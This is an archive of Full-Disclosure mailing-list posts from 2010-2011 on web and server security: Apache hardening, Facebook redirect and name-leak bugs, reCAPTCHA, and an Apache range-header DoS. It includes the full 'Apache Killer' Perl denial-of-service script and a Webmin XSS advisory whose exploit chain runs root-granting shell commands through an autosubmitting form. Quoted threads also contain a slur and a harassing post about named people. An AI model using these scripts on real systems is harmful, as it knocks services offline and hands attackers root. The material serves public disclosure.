Re: [Full-disclosure] one of my servers has been compromized
In addition to the tips given (chroot, disable shell_exec,etc), you should also use open_basedir with DocumentRoot as path on each VirtualHost. In case of a compromise via webapp, this will reduce the compromised zone in the filesystem to the DocumentRoot of one VirtualHost instead of the whole chroot jail. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CodeV discovers 31 vulnerabilitys on 5 OS softwares
On Wed, Nov 23, 2011 at 8:11 AM, Press - Dognædis pr...@dognaedis.com wrote: Dear FullDisclosure, CodeV is a static code analysis tool (currently for php only, but soon to be developed to other languages) developed by Dognaedis to offer a tool to integrate in the development of the life cycle of software in order to detect vulnerabilities that arise from bad input validations as soon as they hit the code. The tool has a public demo version that is limited to a script with 250 lines of code and is available at We analyzed some Open Source software to test our own tool and discovered 31 new vulnerabilities in 5 different opensource softwares. Following responsible disclosures of discovered vulnerabilities throughout CodeV's Open Source Software analysis, we are here reporting all the vulnerabilities discovered as soon as possible to the community, offering security not only to our clients but to the entire public. All the vulnerabilities brought to public previously followed the necessary disclosure protocol to the responsible teams. The vulnerabilities discovered can be found in Thank you for your time and we hope you enjoy CodeV. I liked the disclaimer in submit-ok.html DISCLAIMER: Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Some hash values
On Sun, Oct 9, 2011 at 2:44 PM, Michal Zalewski lcam...@coredump.cx wrote: I believe that this is the best place to post the following hash values: MD5Sum:a762a3b9cbfb3d63034646087680b254 SHA1sum:6f25d72bd693b52de25c36d04f9e17f945420580 SHA256sum:d5886dd14f3eac029d771da6bcc6d49bc2e50c79159e5390c9c0776c725243a5 No, for these specific hash values, I believe the appropriate place to post them would be deviantArt. Use subject 'noise' when posting the hashes of your 0day-exploit you are trying to sell. Like this dude http://seclists.org/fulldisclosure/2011/Jul/21 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache Killer
On Mon, Sep 12, 2011 at 11:26 PM, xD 0x41 wrote:
I know this topic is OLD but, i just wonder and, also having spoken to kcope
re this myself, discussed the size of each bucket wich can be made to
stupendous amounts and using a different vector, ok, instead of Range:bytes=
, picture a GET request with as was shown in the code is there, you
Request-Range: bytes=5-,5-69,5- , now we have bypassed most filters
already in place, and the request range code, is exactly the same as range
code.
Only one person spotted this.
HTTPD advisory was very clear that both Range and Request-Range can be
used. Everyone who unset Range probably unset Request-Range too. If
host is vulnerable its a little better to use Range because using
Request-Range will take 8 bytes more. (more bytes = less ranges)
I have tested a bit the exploit and saw 1300 ranges is just a fixed
number chosen by kingcope but it can be a little bigger. Range field
can be almost 8KB long and its a total waste of bytes to use x-y,
format where y is an increasing number that will take more than one
digit. So instead of 1300 you can get it to 2725 max if you use repeat
x-, where x is always single digit number. By doing that the exploit
gets much more effective.
I have attached the source if anyone cares
#Apache httpd Remote Denial of Service (memory exhaustion)
#Exploit by Kingcope. Concept by Michal Zalewski
#Some modifications by Javier Bassi.
#original code: http://seclists.org/fulldisclosure/2011/Aug/175
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print Apache Remote Denial of Service (memory exhaustion)\n;
print by Kingcope.\n;
print usage: perl killapache.pl host [numforks] page\n;
print example: perl killapache.pl www.example.com 50 index.php\n;
}
$w = ;
$num=0;
for ($k=0;$k2725;$k++) {
$w .= ,$num-;
$num++;
if ($num == 10)
{
$num=0;
}
}
sub killapache {
use vars qw($w);
print ATTACKING $ARGV[0] [using $numforks forks]\n;
$pm = new Parallel::ForkManager($numforks);
for ($k=0;$k$numforks;$k++) {
my $pid = $pm-start and next;
$x = ;
my $sock = IO::Socket::INET-new(PeerAddr = $ARGV[0],
PeerPort = 80,
Proto= 'tcp');
$p = HEAD $path HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$w\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n;
print $sock $p;
while($sock) {
}
$pm-finish;
}
$pm-wait_all_children;
}
sub testapache {
my $sock = IO::Socket::INET-new(PeerAddr = $ARGV[0],
PeerPort = 80,
Proto= 'tcp');
$p = HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n;
print $sock $p;
$x = $sock;
if ($x =~ /Partial/) {
print host seems vuln\n;
return 1;
} else {
return 0;
}
}
if ($#ARGV 0) {
usage;
exit;
}
if ($#ARGV = 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}
$path = ($#ARGV 1) ? '/' . $ARGV[2] : '/';
$v = testapache();
if ($v == 0) {
print Host does not seem vulnerable\n;
exit;
}
while(1) {
killapache();
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [webmin-devel] XSS in Webmin 1.540 + exploit for privilege escalation
In what Webmin-release this will be fixed? Do you have CVE-identifier for this yet? The new version (Webmin 1.550) fixes this vulnerability. I don't have CVE-id, I tried to contact cve.mitre.org guys with no luck. I have BID Bugtraq ID: 47558 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook
On Tue, May 3, 2011 at 7:51 PM, Daniel Clemens daniel.clem...@packetninjas.net wrote: Prove it! You clearly know nothing about our legal system. You might find this links interesting http://www.youtube.com/watch?v=t0aQojDGSD4 http://www.google.com/transparencyreport/governmentrequests/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS in Webmin 1.540 + exploit for privilege escalation
Information
Name : XSS vulnerability in Webmin
Software : All versions prior to and including 1.540 are affected.
Vendor Hompeage : http://www.webmin.com
Vulnerability Type : Cross-Site Scripting
Severity : Medium
Researcher : Javier Bassi javierbassi [at] gmail [dot] com
Description
--
Webmin is a web-based interface for system administration for Unix.
Using any modern web browser, you can setup user accounts, Apache,
DNS, file sharing and much more.
https://secure.wikimedia.org/wikipedia/en/wiki/Webmin
Details
---
Webmin is affected by a XSS vulnerability in all versions prior to and
including 1.540.
Webmin fails to sanitize $real in useradmin/index.cgi. $real is the
Full Name in the finger information of the user. useradmin/index.cgi
is the control panel of the Users Groups section in webmin.
An attacker that has a normal user on the victim's machine could be
able to change his Full Name with chfn command, inject XSS and execute
commands as root.
Timeline:
---
2011.04.24 - announced at my site/informed developers/disclosed at my site.
Solution:
---
wait for updates.
Developing a exploit:
---
With Webmin you can execute shell commands and the only security
measure Webmin has is checking the Referer in the HTTP headers. So we
can't use iframe, but we can bypass this protection by injecting a
code that execute a Javascript file that prints a form that
autosubmits itself to the Webmin's shell.cgi and execute mutiple
commands in the format command1;command2;...;commandn
So XSS--.js--form--autosubmit--shell.cgi
The injected code will be displayed inside a form, so we need to close
the original form first with /form.
The shell/index.cgi form is the next one:
/formform class='ui_form' style=visibility:hidden
action='https://zion:1/shell/index.cgi' method=post
enctype=multipart/form-data
input class='ui_submit' type=submit value=Execute command:
input class='ui_textbox'type=hidden name=cmd value= size=50
style='width:100%'/td
input class='ui_submit' type=submit name=clear value=Clear history
input class='ui_hidden' type=hidden name=pwd value=/root
input class='ui_hidden' type=hidden name=history value=
input class='ui_hidden' type=hidden name=previous value=find /usr
-name sftp-server
input class='ui_hidden' type=hidden name=previous value=echo
/usr/lib/sftp-server /etc/shells
input class='ui_hidden' type=hidden name=previous value=cat /etc/shells
input class='ui_hidden' type=hidden name=previous value=find
/usr/lib -name sftp-server
input class='ui_hidden' type=hidden name=previous value=echo
/usr/lib/openssh/sftp-server /etc/shells
input class='ui_submit' type=submit name=doprev value=Execute
previous command
select class='ui_select' name=pcmd option value=echo
/usr/lib/openssh/sftp-server /etc/shells echo
/usr/lib/openssh/sftp-server /etc/shells
option value=find /usr/lib -name sftp-server find /usr/lib -name sftp-server
option value=cat /etc/shells cat /etc/shells
option value=echo /usr/lib/sftp-server /etc/shells echo
/usr/lib/sftp-server /etc/shells
option value=find /usr -name sftp-server find /usr -name sftp-server
/selectinput type=button name=movecmd value='Edit previous'
onClick='cmd.value = pcmd.options[pcmd.selectedIndex].value'
input class='ui_submit' type=submit name=clearcmds value=Clear commands
/form
We use Javascript to autosubmit it. We add id=lala in form tag and
also we add the next script at the end of the code:
scriptdocument.getElementById('lala').submit();/script
Commands go in 'cmd' input. A nice combination of commands could be:
chfn -f safename neo;usermod -G root neo;usermod -g root neo;killall
-9 firefox-bin
So when the admim browse Users Groups this will change the Full
name of our user 'neo' back to a safe one, makes us root and kill
firefox. The admin will think firefox crashed and when he goes back to
Users and Groups in Webmin it will not crash again beause we already
changed our full name.
To include commands in value= they must be html escaped: (
http://www.htmlescape.net/htmlescape_tool.html )
chfn -f quot;safenamequot; neo;usermod -G root neo;usermod -g root
neo;killall -9 firefox-bin
Now we need a .js file that prints the form + the autosubmit code.
(thx to
http://accessify.com/tools-and-wizards/developer-tools/html-javascript-convertor/
)
It will look like this
document.write(\/formform class='ui_form'
style=\visibility:hidden\ id=\lala\
action='https:\/\/zion:1\/shell\/index.cgi' method=post
enctype=multipart\/form-data );
document.write(input class='ui_submit' type=submit value=\Execute
command:\);
document.write(input class='ui_textbox'type=hidden name=\cmd\
value=\chfn -f quot;safenamequot; neo;usermod -G root neo;usermod
-g root neo;killall -9 firefox-bin\ size=50
style='width:100%'\/td);
document.write(input class='ui_submit' type=submit name=\clear\
value=\Clear history\);
document.write(input class='ui_hidden' type=hidden
Re: [Full-disclosure] Google Search Feature Exploitation Scenario
On Tue, Apr 12, 2011 at 6:11 PM, Cal Leeming wrote: Actually, the filtering seems to be based on the accuracy of the first hit set. http://www.google.com/search?q=hackerbtnI - win http://www.google.com/search?q=hello+hackerbtnI - fail http://www.google.com/search?q=hello+hackbtnI - win http://www.google.com/search?q=hello+hacbtnI - fail http://www.google.com/search?q=hellobtnI - win See what I mean? satyam was right. It also depends on geographical locations. I got redirected with all those links. I'm feeling lucky (?) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook URL redirection issue
Reported this issue to Facebook team on 03/22/11 and Facebook team acknowledged this issue on 03/29/11 and fixed this vulnerability. They still have redirects on apps made by their users, and they don't care http://apps.facebook.com/truthsaboutu/track.php?r=http://www.google.com and if someone falls in basic phishing with facebook domain, he will fall with apps.facebook subdomain too. Btw, linkedin has open redirect too and they couldn't care less about it http://www.linkedin.com/redirect?url=www.google.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook URL Redirect Vulnerability
On Thu, Mar 3, 2011 at 4:04 PM, Chris Evans scarybea...@gmail.com wrote: You do not need an open redirect to trick the user. Try a href=http://www.evil.com;www.facebook.com/OMFGacatvomitingacanaryandpuppiesandshit/a You are all suggesting scenarios in which only a non-tech person would fall. Everybody knows that JavaScript can change the status text when mouserovering a link. This is what Google does in the search results. (Although you can disable this in Firefox in Advanced JavaScript Settings) Also with Nathan's scenario. Even if Facebook only displays 'apps.facebook.com' when posting the link, if the person clicks there it means he is already on Facebook. If he is already logged in Facebook, clicking on a link going to a login page is way too obvious. A good scenario would be via Instant Message. There is no HTML or JavaScript and when the victim clicks a link he knows he's going to that link, and there is a big chance he will not notice it is a redirect. From http://apps.facebook.com/stuff to http://apps.facebook.evil.com/stuff can do the trick. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] HBGary Mirrors?
On Fri, Feb 18, 2011 at 1:24 PM, ck c.kernst...@googlemail.com wrote: So, the FEDs shut down all mirrors of the HBGary files - or didn't they? Just in case anyone wants to host a mirror, they are seeding a full backup of the anonleaks website (6.7GB) Here is the .torrent http://www.2shared.com/file/ZkCwq_ZZ/hbgaryanonleaksrutargz.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice
On Fri, Feb 11, 2011 at 5:30 PM, Leon Kaiser litera...@gmail.com wrote: The pastebin link seems to be down, would you/a third party be so kind as to mirror it? http://www.2shared.com/file/4z209Olp/lgtt7z.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Want to remove Encyclopedia Dramatica article? Think again. Sherrod DeGrippo, Andrew Auernheimer's cyberbully paradise.
About deleting ED article: http://gawker.com/5709789/noose-closes-around-pro+wikileaks-vigilantes On Fri, Jan 7, 2011 at 4:46 AM, Cal Leeming [Simplicity Media Ltd] cal.leem...@simplicitymedialtd.co.uk wrote: This has to be said. Nicholarse Castor sounds like a complete and utter faggot. On Fri, Jan 7, 2011 at 7:34 AM, Victor Rigo victor_r...@yahoo.com wrote: Post: http://crimint.wordpress.com/2011/01/07/why-encyclopedia-dramatica-is-so-insidious/ It’s a graffiti wall. The first level of wrong is the action. The action that is mean-spirited toward an individual. Everyone has done something mean or retaliatory before, others have done embarrassing things. Maybe you trolled someone. Maybe you posted pictures of yourself online. This in itself is bad, however, in time-space, unless a serious tragedy is committed, life goes on. You can forget. Encyclopedia Dramatica perpetuates a horrendous act to the annals of history for the perverse enjoyment of anonymous cowards. It sounds like the detective’s best tool. Think about it, it’s open source intelligence. :D The difficulty is tragic. The protections for free speech in the United States are so wrong and laws in states are very new. I have not seen any criminal cases based off harassment When graffiti is on the wall, we could normally call up the city to clean it off. ED makes this troublesome if not impossible. * Encyclopedia Dramatica is an entity owned by Sherrod DeGrippo. To set the tone her capacity for empathy, she links to a republished list of pedophilia books [1] on her home page GirlVinyl.com. * Encyclopedia Dramatica also has access to attack dog weev (aka Andrew Auernheimer). He is belligerent to any thought of removal of posts, unless you’re willing to strip naked and masturbate [2]. * Encyclopedia Dramatica is ran by a hivemind trolls who are miserable. They are feeding off each other for lulz, which psychotically is the enjoyment of pain of another. * Streisand Effect Zone. Attempts to censor an article, no matter how lurid (If you must, Nikki Catsouras) will spread the material even further. What we have here is the criminal mind. Not a jolted crime spree, not a series of youthful indiscretions. What we have is a twisted, knowing facilitator, a kingpin, a dark witch. DeGrippo doesn’t sound like someone who is miserable. Rather, she sounds feminine. Like someone you’re aunt would do her nails with. Her hobbies include interior decorating, baking, and hosting a site which gives people nightmares at night. That’s why I made the post Sherrod DeGrippo’s Nightmare Machine. [3] End Notes [1] DeGrippo, Sherrod. List of Pedophilia and Incest books. 2011-01-07. URL: http://girlvinyl.com/lj2007/LJbannedbooks/index.html. Accessed: 2011-01-07. (Archived by WebCite® at http://www.webcitation.org/5vYEuWoeP) [2] Castor, Nicholas. Want to have your article removed from Encyclopedia Dramatica? 2011-01-07. URL:http://crimint.wordpress.com/2011/01/07/want-to-have-your-article-removed-from-encyclopedia-dramatica/. Accessed: 2011-01-07. (Archived by WebCite® at http://www.webcitation.org/5vYMbt4xq) [3] http://seclists.org/fulldisclosure/2010/Dec/52 Further Archives DeGrippo, Sherrod. GirlVinyl.com Homepage. 2011-01-07. URL:http://girlvinyl.com. Accessed: 2011-01-07. (Archived by WebCite® at http://www.webcitation.org/5vYFFUDpV) Reporting FBI. http://tips.fbi.gov CrimINT tipline. http://crimint.wordpress.com/send-tips/ (any cybercrime tips welcomed) Victor Rigo, CISSP Independent Computer Security Consultant Buenos Aires, AR +5411-4316-1901 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] adobe.com important subdomain SQL injection again!
Yet Flashblock has 10 million downloads On Sat, Dec 18, 2010 at 8:30 PM, Victor Rigo victor_r...@yahoo.com wrote: Let's see, flash is: - Cross-platform - Cross-architecture - Has it's own programming language - Is embedded on websites - Access to javascript to popup, local caches, etc. It's not ineptness, it's what you get when you right software that can actually do stuff. If Java applets were still the hip thing, you'd see the same thing about that. Victor Rigo, CISSP Computer Security Consultant +5411-4316-1900 Buenos Aires, Argentina --- On *Sat, 12/18/10, Jeffrey Walton noloa...@gmail.com* wrote: From: Jeffrey Walton noloa...@gmail.com Subject: Re: [Full-disclosure] adobe.com important subdomain SQL injection again! To: Maciej Gojny v...@ariko-security.com Cc: full-disclosure@lists.grok.org.uk Date: Saturday, December 18, 2010, 5:53 PM On Sat, Dec 18, 2010 at 11:58 AM, Maciej Gojny v...@ariko-security.comhttp://mc/compose?to=v...@ariko-security.com wrote: hello full disclosure! After six months from the first contact with Adobe security team, important adobe.com subdomain is still vulnerable to SQL injection attacks. We hope that this time, serious people will try to solve the problem. There's a reason Adobe is the most attacked software [1,2], and its probably because they write the most vulnerable software (or adversaries are looking for a challenge, which seems less intuitive and highly unlikely to me). It appears insecurity is an enterprise wide practice, and not just limited to their software. Jeff [1] Adobe surpasses Microsoft as favorite hacker’s target (Jul 2009) http://lastwatchdog.com/adobe-surpasses-microsoft-favorite-hackers-target/ [2] Adobe predicted as top 2010 hacker target (Dec 2009) http://www.theregister.co.uk/2009/12/29/security_predictions_2010/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook name + photo extraction using 'Forgot Password' page
Did you reported this? Apparently reset.php has been fixed. http://img440.imageshack.us/img440/3637/screenshotjm.png On Thu, Aug 12, 2010 at 5:06 AM, Rishabh Singla rishabhsin...@rishabhsingla.com wrote: Hi everyone, This is with reference to the post by Mr. Atul Agarwal dated 11-Aug-10, and posted here (http://seclists.org/fulldisclosure/2010/Aug/130), in which Mr. Atul describes how a spammer might enter email addresses and extract the names (and photos) from Facebook accounts registered against those email IDs. Mr. Atul also mentions that this technique can be used to validate email addresses in one's possession. Would like to point out that another way to harness this information is through Facebook's Forgot your password? page (located at http://www.facebook.com/reset.php). By entering an email address on this webpage, a user's name, a photo and possibly a snippet of text is displayed (assuming a Facebook user exists against this email ID). I came across this on 6-Jun-10, and posted the same on my blog on 7-Jun-10. You might want to read the details on my blog (http://blog.rishabhsingla.com/2010/06/facebooks-reset-password-page-has.html). Rishabh Singla http://blog.rishabhsingla.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Facebook name extraction based on email/wrong password + POC
Uploading an address book will check the privacy settings of each contacts and it will not display contacts that have chosen not to appear in facebook search results. It's the same that searching for the email directly on the seach box: http://www.facebook.com/search/?q=...@something.com As said by Atul, when email is valid and password is not, it does not check the privacy settings and displays profile pic+name, so this is a bug. On Wed, Aug 11, 2010 at 11:20 AM, Atul Agarwal a...@secfence.com wrote: Never encountered that, nevertheless excellent find! Would check it and would incorporate that in the script! Thanks, Atul Agarwal Secfence Technologies www.secfence.com On Wed, Aug 11, 2010 at 7:41 PM, Kevin Connolly bugt...@gmail.com wrote: It gets better. If you enter an e-mail address that is close but not exactly right then Facebook will correct it for you Fixed Misspelling It looks like you entered a slight misspelling of your email or username. Please re-enter your password. and it displays the corrected e-mail address in the login box :-) On Wed, Aug 11, 2010 at 10:01 AM, Atul Agarwal a...@secfence.com wrote: Hello all, Sometime back, I noticed a strange problem with Facebook, I had accidentally entered wrong password in Facebook, and it showed my first and last name with profile picture, along with the password incorrect message. I thought that the fact that it was showing the name had something to do with cookies stored, so I tried other email id's, and it was the same. I wondered over the possibilities, and wrote a POC tool to test it. This script extracts the First and Last Name (provided by the users when they sign up for Facebook). Facebook is kind enough to return the name even if the supplied email/password combination is wrong. Further more,it also gives out the profile picture (this script does not harvest it, but its easy to add that too). Facebook users have no control over this, as this works even when you have set all privacy settings properly. Harvesting this data is very easy, as it can be easily bypassed by using a bunch of proxies. As Facebook is so popular, some implications - 1) Someone has a list of email address that he has no clue about. He can feed them to Facebook one by one (or in a list, using a script like this) and chances are that he'll get more than 50% hits. Useful for phishing attacks (People will get more convinced when they see their *real* names). 2) One can generate random email addresses, and *verify* their existence . Hint: You can generate emails using (common names + a corporate domain), and check them against Facebook. Might come handy in a Pentest. Rest is only left up to one's imagination. Find the POC script attached. PS: I did not report this, as I am unsure on what to call it, a bug, vuln or a feature. Thanks, Atul Agarwal Secfence Technologies www.secfence.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] reCAPTCHA Broken
It doesn't work. -_- Sometimes you can type the two words wrong and it takes them as valid. If the words have typo mistakes like for example typing jold instead of hold. Probably reCAPTCHA knows its a typo and corrects it. On Tue, Aug 3, 2010 at 2:44 AM, awf awf lol-wut-h...@live.com wrote: 1. Select Audio Captcha 2. Type in ten random words and submit 3. ??? 4. Profit! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
